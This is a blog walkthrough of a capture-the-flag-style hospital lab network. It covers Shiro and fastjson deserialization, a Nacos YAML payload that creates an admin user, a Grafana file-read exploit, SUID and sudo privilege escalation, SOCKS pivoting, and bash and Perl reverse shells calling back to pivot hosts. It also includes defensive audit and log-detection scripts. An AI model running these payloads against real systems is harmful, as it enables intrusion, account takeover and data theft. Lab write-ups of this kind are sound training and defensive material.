
# 春秋云镜 - Hospital

## External network

### Reconnaissance

```shell
./fscan -h 39.99.227.240
┌──────────────────────────────────────────────┐
    ___                              _
   / _ \     ___  ___ _ __ __ _  ___| | __
  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-17 23:18:43] [INFO] 暴力破解线程数: 1
[2025-04-17 23:18:43] [INFO] 开始信息扫描
[2025-04-17 23:18:43] [INFO] 最终有效主机数量: 1
[2025-04-17 23:18:43] [INFO] 开始主机扫描
[2025-04-17 23:18:43] [INFO] 有效端口数量: 233
[2025-04-17 23:18:43] [SUCCESS] 端口开放 39.99.227.240:22
[2025-04-17 23:18:43] [SUCCESS] 服务识别 39.99.227.240:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-17 23:18:43] [SUCCESS] 端口开放 39.99.227.240:8080
[2025-04-17 23:18:49] [SUCCESS] 服务识别 39.99.227.240:8080 => [http]
[2025-04-17 23:18:49] [INFO] 存活端口数量: 2
[2025-04-17 23:18:49] [INFO] 开始漏洞扫描
[2025-04-17 23:18:49] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-17 23:18:49] [SUCCESS] 网站标题 http://39.99.227.240:8080 状态码:302 长度:0      标题:无标题 重定向地址: http://39.99.227.240:8080/login;jsessionid=A315BAAC49DBECD9223E0BD9C6FB94DB
[2025-04-17 23:18:50] [SUCCESS] 网站标题 http://39.99.227.240:8080/login;jsessionid=A315BAAC49DBECD9223E0BD9C6FB94DB 状态码:200 长度:2005   标题:医疗管理后台
[2025-04-17 23:18:52] [SUCCESS] 目标: http://39.99.227.240:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称:
  详细信息:
	author:AgeloVito
	links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-04-17 23:18:57] [SUCCESS] 扫描已完成: 3/3
```

The scan finds a web application on port 8080 and a heapdump leak; directory brute-forcing with dirsearch turns up /actuator/heapdump.

```shell
python3 dirsearch.py -u http://39.99.227.240:8080
```

### Shiro deserialization

Analysing the heapdump with JDumpSpider recovers the key, which suggests Shiro.

```shell
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump > 1.txt
```

```
key = GAYysgMQhG7/CzIJlVpR2g==
```

Capturing the traffic indeed shows the Shiro fingerprint; the classic combination.


Use the tool directly to inject a memory shell.


The PHP webshell would not connect here; the JSP one works.


Connect with AntSword (蚁剑).


### SUID privilege escalation

```shell
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
```

Per GTFOBins, a SUID vim.basic can be used to write an SSH public key (or to edit passwd / sudoers).

So first upgrade to an interactive shell:

```shell
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
# ctrl+z
stty raw -echo; fg
reset
export TERM=xterm-256color
```

```shell
vim.basic /etc/passwd
:wq!
```

Generate the hash and append the line to /etc/passwd:

```shell
openssl passwd -1 -salt 123 123456
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash
```
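A defender-side check for what the step above leaves behind in /etc/passwd: an extra UID-0 account and a password hash kept in the file instead of /etc/shadow. This is an added example, not code from the original post; `PASSWD_SAMPLE` is constructed, with the post's injected line embedded (note it has only 6 fields, GECOS dropped, which the parser flags as malformed before padding it).

```python
# Audit /etc/passwd content for backdoor indicators (added example, not from the post).

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
app:x:1000:1000::/home/app:/bin/bash
hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash
"""


def parse_passwd(text):
    """Yield (fields, note) per entry; fields are padded to 7, note is set when malformed."""
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        note = None
        if len(fields) == 6:            # GECOS field dropped, as in a hand-written line
            fields.insert(4, "")
            note = "malformed: 6 fields instead of 7"
        elif len(fields) != 7:
            note = f"malformed: {len(fields)} fields"
            fields = (fields + [""] * 7)[:7]
        yield fields, note


def audit_passwd(text):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    for (name, pw, uid, _gid, _gecos, home, shell), note in parse_passwd(text):
        if note:
            findings.append(f"{name}: {note}")
        if uid == "0" and name != "root":
            findings.append(f"{name}: extra UID-0 account (home={home}, shell={shell})")
        if pw == "":
            findings.append(f"{name}: empty password field (passwordless login)")
        elif pw not in ("x", "*", "!"):
            # Modern systems keep hashes in /etc/shadow; a hash here means a direct edit.
            findings.append(f"{name}: password hash stored in /etc/passwd instead of /etc/shadow")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_SAMPLE):
        print(finding)
```

Compare the result against a package-manager baseline and /etc/shadow; any UID-0 entry other than root is an incident, not a configuration choice.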

### flag1

SSH in; the web1 host is taken.


## First-layer intranet

### Reconnaissance

As usual, start with fscan to gather information.

```shell
root@web01:/home/app# ./fscan_linux -h 172.30.12.5/24
┌──────────────────────────────────────────────┐
    ___                              _
   / _ \     ___  ___ _ __ __ _  ___| | __
  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-18 00:07:09] [INFO] 暴力破解线程数: 1
[2025-04-18 00:07:09] [INFO] 开始信息扫描
[2025-04-18 00:07:10] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2025-04-18 00:07:10] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 00:07:10] [INFO] 解析CIDR 172.30.12.5/24 -> IP范围 172.30.12.0-172.30.12.255
[2025-04-18 00:07:10] [INFO] 最终有效主机数量: 256
[2025-04-18 00:07:10] [INFO] 开始主机扫描
[2025-04-18 00:07:10] [SUCCESS] 目标 172.30.12.5     存活 (ICMP)
[2025-04-18 00:07:10] [SUCCESS] 目标 172.30.12.6     存活 (ICMP)
[2025-04-18 00:07:10] [SUCCESS] 目标 172.30.12.236   存活 (ICMP)
[2025-04-18 00:07:13] [INFO] 存活主机数量: 3
[2025-04-18 00:07:13] [INFO] 有效端口数量: 233
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:445
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:139
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:135
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.236:22
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.5:22
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.236:8009
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.5:8080
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.236:8080
[2025-04-18 00:07:13] [SUCCESS] 端口开放 172.30.12.6:8848
[2025-04-18 00:07:13] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 00:07:13] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.6:445 => 
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.6:139 =>  Banner:[.]
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.236:8009 => 
[2025-04-18 00:07:18] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2025-04-18 00:07:19] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2025-04-18 00:07:24] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2025-04-18 00:08:18] [SUCCESS] 服务识别 172.30.12.6:135 => 
[2025-04-18 00:08:18] [INFO] 存活端口数量: 9
[2025-04-18 00:08:18] [INFO] 开始漏洞扫描
[2025-04-18 00:08:18] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-18 00:08:18] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
   IPv4地址:
      └─ 172.30.12.6
[2025-04-18 00:08:18] [SUCCESS] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[2025-04-18 00:08:18] [SUCCESS] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=1ACFB6A4E51D284ABDFA37E0E80326B9
[2025-04-18 00:08:18] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2025-04-18 00:08:18] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=1ACFB6A4E51D284ABDFA37E0E80326B9 状态码:200 长度:2005   标题:医疗管理后台
[2025-04-18 00:08:19] [SUCCESS] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[2025-04-18 00:08:20] [SUCCESS] 目标: http://172.30.12.5:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-04-18 00:08:20] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-04-18 00:08:21] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  漏洞名称: 
  详细信息:
        author:kmahyyg(https://github.com/kmahyyg)
        links:https://github.com/alibaba/nacos/issues/4593
```

Two more assets are found:

172.30.12.6:8848 runs a Nacos service with a YAML deserialization vulnerability.

172.30.12.236:8080 has a web service; going by the challenge hint, it is presumably fastjson.

### First-level proxy

```shell
./agent_linux_x64 -lport 8888
```

```shell
./admin_macos_x64 -rhost 39.99.227.240 -rport 8888
Venom Admin Node Start...

  ____   ____  { v1.1  author: Dlive }
  \   \ /   /____   ____   ____   _____
   \   Y   // __ \ /    \ /    \ /     \
    \     /\  ___/|   |  (  <_> )  Y Y  \
     \___/  \___  >___|  /\____/|__|_|  /
                \/     \/             \/

(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 9999
a socks5 proxy of the target node has started up on the local port 9999.
```


### 172.30.12.6 - flag2

The weak credentials nacos:nacos get into the console, where the Nacos configuration can be read:

```yaml
server:
  port: 8080
  servlet:
    context-path: /hello

spring:
  application:
    name: db-config
  cloud:
    nacos:
      discovery:
        server-addr: 127.0.0.1:8848
      config:
        server-addr: 127.0.0.1:8848
        file-extension: yaml
        namespace: dev
        group: DEFAULT_GROUP
        data-id: db-config.yaml
  datasource:
    mysql:
      url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
      username: root
      password: P@ssWord!!!
  redis:
    host: localhost
    port: 6379

management:
  endpoints:
    web:
      exposure:
        include: '*'
```
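The configuration above carries the two weaknesses behind both the external heapdump leak and this intranet step: `management.endpoints.web.exposure.include: '*'` (which is what publishes /actuator/heapdump) and a plaintext database password. As an added example, not code from the original post, here is a small audit that flags both and passes once they are fixed; `SAMPLE_YAML` is a constructed excerpt of the leaked config, and the mini parser only understands the plain nested `key: value` subset used here (no lists, anchors or multi-line values).

```python
# Audit a Spring Boot application.yaml for Actuator over-exposure and plaintext secrets
# (added example, not from the post; parser covers only simple nested key: value maps).

SAMPLE_YAML = """\
server:
  port: 8080
spring:
  datasource:
    mysql:
      url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC
      username: root
      password: P@ssWord!!!
management:
  endpoints:
    web:
      exposure:
        include: '*'
"""

# Endpoints that leak memory, environment or allow control; never expose them unauthenticated.
SENSITIVE_ENDPOINTS = {"heapdump", "env", "threaddump", "loggers", "shutdown", "jolokia"}


def flatten_yaml(text):
    """Flatten the indented key: value subset into {'a.b.c': 'value'} (values unquoted)."""
    out, stack = {}, []  # stack holds (indent, key) for the current nesting path
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")  # split at the first colon only
        value = value.strip().strip("'\"")
        while stack and stack[-1][0] >= indent:
            stack.pop()
        stack.append((indent, key))
        if value:
            out[".".join(k for _, k in stack)] = value
    return out


def audit(text):
    """Return findings for the two weaknesses; an empty list means both are fixed."""
    cfg = flatten_yaml(text)
    findings = []
    exposed = cfg.get("management.endpoints.web.exposure.include", "health")  # Boot default
    names = {e.strip() for e in exposed.split(",")}
    if "*" in names or names & SENSITIVE_ENDPOINTS:
        findings.append(f"actuator exposure.include={exposed}: heapdump/env reachable; use health,info")
    for key, value in cfg.items():
        if key.rsplit(".", 1)[-1] in ("password", "secret") and not value.startswith("${"):
            findings.append(f"plaintext credential at {key}; reference a secret, e.g. ${{DB_PASSWORD}}")
    return findings
```

Run `audit()` over every config stored in Nacos; a config server that anyone can log into with nacos:nacos makes every plaintext value in it effectively public.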

The Nacos exploitation tool confirms the YAML deserialization vulnerability.


Since the host is Windows, the payload is changed to add a new administrator user:

```java
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("net user baoyf passwd1234 /add");
        Runtime.getRuntime().exec("net localgroup administrators baoyf /add");
    } catch (IOException e) {
        e.printStackTrace();
    }
}
```

Compile and package.


It has to be compiled with Java 1.8; this held things up for a long time.

The host has no internet access, so upload the malicious jar to web1, start a web server there, and have the target fetch it:

```shell
python3 -m http.server 1234
```


The request arrives, confirming the vulnerability. RDP in, and flag2 is in the administrator's home directory.


### 172.30.12.236 - flag3

Now the other host: a Yakit plugin scan finds an RCE vulnerability.


Next, reproduce it: start the JNDI server on web1, and since there is no outbound access, bounce the shell back to web1.

```shell
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMzAuMTIuNS81MDAwIDA+JjE=}|{base64, -d} | {bash,-i]" -A "172.30.12.5"
```


```json
{
	"name": {
		"@type": "java.lang.Class",
		"val": "com.sun.rowset.JdbcRowSetImpl"
	},
	"x": {
		"@type": "com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName": "rmi://172.30.12.5:1099/qt6t66",
		"autoCommit": true
	}
}
```

```shell
nc -lvnp 5000
```

The web3 host is taken.


## Second-layer intranet

### Reconnaissance

Change the root password on web3 to make the next steps easier.

No hosts are left, but one flag is still missing. `ip a` shows a second network interface, so upload fscan and scan the intranet further.

```shell
passwd
ssh [email protected]
wget http://172.30.12.5:1234/fscan_linux
wget http://172.30.12.5:1234/agent_linux_x64
```

```shell
root@web03:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:28:b3:f3 brd ff:ff:ff:ff:ff:ff
    inet 172.30.12.236/16 brd 172.30.255.255 scope global dynamic eth0
       valid_lft 315352567sec preferred_lft 315352567sec
    inet6 fe80::216:3eff:fe28:b3f3/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:28:b3:cb brd ff:ff:ff:ff:ff:ff
    inet 172.30.54.179/24 brd 172.30.54.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe28:b3cb/64 scope link 
       valid_lft forever preferred_lft forever
```

Scan the 172.30.54.179/24 segment:

```shell
root@web03:~# ./fscan_linux -h 172.30.54.179/24
┌──────────────────────────────────────────────┐
    ___                              _
   / _ \     ___  ___ _ __ __ _  ___| | __
  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-18 01:22:38] [INFO] 暴力破解线程数: 1
[2025-04-18 01:22:38] [INFO] 开始信息扫描
[2025-04-18 01:22:38] [INFO] CIDR范围: 172.30.54.0-172.30.54.255
[2025-04-18 01:22:39] [INFO] 生成IP范围: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 01:22:39] [INFO] 解析CIDR 172.30.54.179/24 -> IP范围 172.30.54.0-172.30.54.255
[2025-04-18 01:22:39] [INFO] 最终有效主机数量: 256
[2025-04-18 01:22:39] [INFO] 开始主机扫描
[2025-04-18 01:22:39] [SUCCESS] 目标 172.30.54.179   存活 (ICMP)
[2025-04-18 01:22:39] [SUCCESS] 目标 172.30.54.12    存活 (ICMP)
[2025-04-18 01:22:42] [INFO] 存活主机数量: 2
[2025-04-18 01:22:42] [INFO] 有效端口数量: 233
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.179:22
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.12:22
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.12:5432
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.12:3000
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.179:8009
[2025-04-18 01:22:42] [SUCCESS] 端口开放 172.30.54.179:8080
[2025-04-18 01:22:42] [SUCCESS] 服务识别 172.30.54.179:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 01:22:42] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.12:5432 => 
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.179:8009 => 
[2025-04-18 01:22:47] [SUCCESS] 服务识别 172.30.54.179:8080 => [http]
[2025-04-18 01:22:47] [INFO] 存活端口数量: 6
[2025-04-18 01:22:47] [INFO] 开始漏洞扫描
[2025-04-18 01:22:48] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle
[2025-04-18 01:22:48] [SUCCESS] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2025-04-18 01:22:48] [SUCCESS] 网站标题 http://172.30.54.12:3000  状态码:302 长度:29     标题:无标题 重定向地址: http://172.30.54.12:3000/login
[2025-04-18 01:22:48] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909  标题:Grafana
```

This finds the asset 172.30.54.12 running Grafana (port 3000) and PostgreSQL (port 5431).

### Second-level proxy

```shell
(node 1) >>> show
A
+ -- 1
(node 1) >>> listen 9998
listen 9998
the port 9998 is successfully listening on the remote node!
(node 1) >>> show
A
+ -- 1
     + -- 2
(node 1) >>> goto 2
node 2
(node 2) >>> socks 9998
a socks5 proxy of the target node has started up on the local port 9998.
```

```shell
root@web03:~# ./agent_linux_x64 -rhost 172.30.12.5 -rport 9998
2025/04/18 01:27:05 [+]Successfully connects to a new node
```


### 172.30.54.12 - flag4

Grafana is affected by CVE-2021-43798; using GrafanaExp yields the database password:

```shell
./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
type:[postgres]	name:[PostgreSQL]		url:[localhost:5432]	user:[postgres]	password[Postgres@123]
```

With the proxy in place, connect to the database locally. The root user's password can be changed, and psql can also create a function to execute commands; the drawback is that there is no output.

There is no outbound access, so bounce a shell back to web3; bash cannot be used, but perl can.

```shell
psql -h 172.30.54.12 -U postgres -W
# reverse shell
select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
# change the database admin password
ALTER USER root WITH PASSWORD '123456';
```
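Both statements above land in PostgreSQL's statement log when `log_statement = 'all'` (or pgaudit) is on, which is where a defender would catch this step. As an added example, not code from the original post, this detector parses statement-log lines and raises on a UDF that runs OS commands, on shell and socket primitives inside SQL, and on password changes for roles; `LOG_LINES` are constructed in the default `log_line_prefix` style `%m [%p] %u@%d` and carry shortened versions of the post's statements. Note that `system()` is not a built-in PostgreSQL function; its presence at all means someone created one.

```python
# Detect OS-command execution and credential changes in PostgreSQL statement logs
# (added example, not from the post; LOG_LINES are constructed).
import re

LOG_LINES = [
    "2025-04-18 01:40:02 UTC [2231] postgres@postgres LOG:  statement: select version();",
    "2025-04-18 01:40:09 UTC [2231] postgres@postgres LOG:  statement: "
    "select system('perl -e ''use Socket;socket(S,PF_INET,SOCK_STREAM,0);exec(\"/bin/sh -i\");''');",
    "2025-04-18 01:40:31 UTC [2231] postgres@postgres LOG:  statement: ALTER USER root WITH PASSWORD '123456';",
]

# Matches the default prefix "%m [%p] %u@%d " followed by the statement itself.
LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@ ]+)@(?P<db>\S+) LOG:  statement: (?P<sql>.*)$"
)

RULES = [
    # A system()/COPY PROGRAM call means SQL is being used to run OS commands.
    ("os-command via UDF or COPY PROGRAM", re.compile(r"\bsystem\s*\(|\bCOPY\b.*\bPROGRAM\b", re.I)),
    # Shell and socket primitives have no business inside a query string.
    ("shell/network primitives in SQL", re.compile(r"/bin/sh|/bin/bash|/dev/tcp/|perl\s+-e|socket\(|exec\(", re.I)),
    # Password changes on roles should be rare and come from a change process, not an app login.
    ("credential change on role", re.compile(r"\bALTER\s+(USER|ROLE)\s+\S+\s+.*\bPASSWORD\b", re.I)),
]


def detect(lines):
    """Return (user, db, rule_label, sql) for every statement-log line matching a rule."""
    hits = []
    for line in lines:
        match = LINE.match(line)
        if not match:
            continue  # not a statement line (e.g. DETAIL:, connection messages)
        sql = match.group("sql")
        for label, pattern in RULES:
            if pattern.search(sql):
                hits.append((match.group("user"), match.group("db"), label, sql))
    return hits


if __name__ == "__main__":
    for user, db, label, sql in detect(LOG_LINES):
        print(f"[{label}] {user}@{db}: {sql[:80]}")
```

Pairing this with `sudo -l` review on the database host closes the loop: a NOPASSWD psql rule for the postgres account turns any such UDF into root, as the next step shows.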

sudo privilege escalation:

```shell
postgres@web04:/usr/local/pgsql/data$ sudo -l
Matching Defaults entries for postgres on web04:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on web04:
    (ALL) NOPASSWD: /usr/local/postgresql/bin/psql
```

```shell
sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash
```


## References

Fastjson 1.2.24 deserialization leading to arbitrary command execution

春秋云镜 simulation range Hospital hands-on walkthrough

https://www.orac1e.me/blog/yunjing/hospital
Author: Orac1e
Published: April 18, 2025